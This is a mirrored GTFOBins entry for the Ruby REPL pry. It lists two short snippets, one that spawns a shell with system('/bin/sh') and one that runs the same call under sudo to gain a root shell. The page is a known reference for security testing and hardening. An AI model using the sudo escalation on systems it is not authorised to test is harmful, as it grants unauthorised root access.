mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
12 lines
145 B
Markdown
12 lines
145 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
pry
|
||
|
system("/bin/sh")
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo pry
|
||
|
system("/bin/sh")
|
||
|
---
|